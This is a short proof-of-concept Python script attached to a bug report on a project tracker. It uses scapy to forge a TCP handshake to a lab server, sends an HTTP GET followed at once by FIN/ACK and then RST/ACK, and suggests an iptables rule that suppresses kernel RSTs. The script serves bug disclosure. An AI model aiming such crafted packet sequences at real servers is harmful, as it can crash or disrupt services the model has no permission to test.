Project

General

Profile

Bug #2770 » poc.py

Alexey Vishnyakov, 01/14/2019 11:51 AM

 
1
from scapy.all import *
2

    
3
'''
4
Note: linux might send an RST for forged SYN packets. Disable it by executing:
5
#> iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <src_ip> -j DROP
6
'''
7

    
8
dst  = "192.168.56.1"
9
dport = 8080
10
sport = random.randint(1024,65535)
11
seq = random.randint(1, 50000)
12

    
13
pkt = IP(dst = dst)
14

    
15
# 3whs start
16

    
17
# SYN
18
pkt_syn = pkt/TCP(sport = sport, dport = dport, seq = seq, flags = 'S')
19

    
20
# SYN/ACK
21
pkt_syn_ack = sr1(pkt_syn, verbose = 0)
22

    
23
# ACK
24
seq += 1
25
if pkt_syn_ack.ack != seq:
26
	print 'Bad ACK number !'
27

    
28
ack = pkt_syn_ack.seq + 1
29
pkt_ack = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'A')
30
send(pkt_ack)
31

    
32
# 3whs end
33

    
34
http_req = '\r\n'.join(['GET /index.html HTTP/1.1'
35
						,'Host: {}'.format(dst)
36
						,'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0'
37
						,'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
38
						,'Accept-Language: en-US,en;q=0.5'
39
						,'Accept-Encoding: gzip, deflate'
40
						,'Connection: keep-alive'
41
						,'\r\n'])
42

    
43
pkt_http_req = pkt/TCP(sport = sport, dport = dport, seq = seq, ack = ack, flags = 'AP')/http_req
44
pkt_fin_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req), ack = ack, flags = 'AF')
45

    
46
# Send GET request
47
send(pkt_http_req)
48
# Send FIN/ACK just after GET request
49
send(pkt_fin_ack)
50

    
51
# Receive GET answer
52
pkt_http_resp = sniff(filter = 'tcp', count = 1)
53
print str(pkt_http_resp[0].payload)[40:]
54

    
55
# Send RST/ACK after response
56
pkt_rst_ack = pkt/TCP(sport = sport, dport = dport, seq = seq + len(http_req) + 1, ack = ack + len(str(pkt_http_resp[0].payload)[40:]), flags = 'AR')
57
send(pkt_rst_ack)
(2-2/3)